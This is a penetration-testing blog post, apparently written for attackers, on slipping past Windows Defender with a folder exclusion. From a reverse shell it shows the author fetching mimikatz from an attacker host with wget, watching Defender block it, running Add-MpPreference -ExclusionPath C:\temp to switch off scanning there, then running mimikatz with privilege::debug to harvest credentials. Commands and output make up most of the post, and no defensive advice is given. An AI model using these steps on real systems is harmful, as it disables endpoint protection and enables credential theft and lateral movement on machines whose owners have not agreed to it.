Do not Bypass, Let's Exclude - Windows Defender

Do not Bypass, Let’s Exclude

AV-bypass is our one of the challanging stage when doing penetration testing. Sometimes we do not need to act any bypass method cause of AV did not configure correctly or it is not licesed and it does not catch or detect our payloads, enumeration tools etc. But in generally, they can be frustrating.

In this write, I do not provide any AV bypass, hidding or encryption method. Sometimes simple methods can be more effective.

As you know, Some applications or services works as malicious by endpoint protection softwares somehow and vendors advise to exclude them for AV scanning. End of the day, IT admins add them to AV scan exclude list and related applications or services work as expected.

So, as we penetration testers want to run our payloads correctly and get reverse shell or runs enum tools as exptected. It is our right, Is not it ?

Step 1 - Enumeration

Here is a reverse shell on a Windows host.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
C:\Users\berkan\Desktop>whoami
whoami
desktop-o9a8a9n\berkan

C:\Users\berkan\Desktop>net user berkan
net user berkan
User name                    berkan
Full Name                    
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/24/2021 8:35:27 PM
Password expires             Never
Password changeable          4/24/2021 8:35:27 PM
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   5/31/2021 6:46:10 PM

Logon hours allowed          All

Local Group Memberships      *Administrators       
Global Group memberships     *None                 
The command completed successfully.


C:\Users\berkan\Desktop>

What a chance, the user is a member of local administrators group. Well, let’s run mimikatz and get some hashes or clear-text passwords for lateral movement. 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
C:\Temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Temp> wget "http://172.16.255.20/mimikatz/x64/mimikatz.exe" -OutFile "C:\Temp\mimikatz.exe"
wget "http://172.16.255.20/mimikatz/x64/mimikatz.exe" -OutFile "C:\Temp\mimikatz.exe"
PS C:\Temp> dir
dir


    Directory: C:\Temp


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         5/31/2021   7:22 PM        1045256 mimikatz.exe                                                         


PS C:\Temp> .\mimikatz.exe
.\mimikatz.exe
Program 'mimikatz.exe' failed to run: Operation did not complete successfully because the file contains a virus or 
potentially unwanted softwareAt line:1 char:1
+ .\mimikatz.exe
+ ~~~~~~~~~~~~~~.
At line:1 char:1
+ .\mimikatz.exe
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
 
PS C:\Temp>

Oops. There is an endpoint protection software is working. When run tasklist /SVC, WinDefend aka. Windows Defender is looks running.

1
MsMpEng.exe                   3344 WinDefend

Step 2 - Adding Exclusion

Well, let’s read Windows Documentations for Windows Defender[1] commands.

First of all, check exists configurations of Windows Defender. Get-MpPreference command will be help for it.

1
2
3
4
5
6
7
8
PS C:\temp> Get-MpPreference | Select-Object -Property ExclusionPath, ExclusionExtension, ExclusionProcess | Format-List
Get-MpPreference | Select-Object -Property ExclusionPath, ExclusionExtension, ExclusionProcess | Format-List


ExclusionPath      : 
ExclusionExtension : 
ExclusionProcess   :

There are no defined exclusions. We can set an exclusion.

1
2
3
4
5
6
7
8
9
10
PS C:\temp>  Add-MpPreference -ExclusionPath "C:\temp"
 Add-MpPreference -ExclusionPath "C:\temp"
PS C:\temp> Get-MpPreference | Select-Object -Property ExclusionPath, ExclusionExtension, ExclusionProcess | Format-List
Get-MpPreference | Select-Object -Property ExclusionPath, ExclusionExtension, ExclusionProcess | Format-List


ExclusionPath      : {C:\temp}
ExclusionExtension : 
ExclusionProcess   :

In technically, Windows Defender does not scan C:\temp directory and we can run any malicious tools on it. So, I can download and run mimikatz. 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
PS C:\temp> wget "http://172.16.255.20/mimikatz/x64/mimikatz.exe" -OutFile "C:\Temp\mimikatz.exe"
wget "http://172.16.255.20/mimikatz/x64/mimikatz.exe" -OutFile "C:\Temp\mimikatz.exe"
PS C:\temp> dir
dir


    Directory: C:\temp


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----         5/31/2021   7:50 PM        1045256 mimikatz.exe                                                         
                                                              


PS C:\temp> .\mimikatz.exe
.\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x86) #19041 Sep 18 2020 19:18:00
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/


mimikatz # privilege::debug
Privilege '20' OK


Cheers !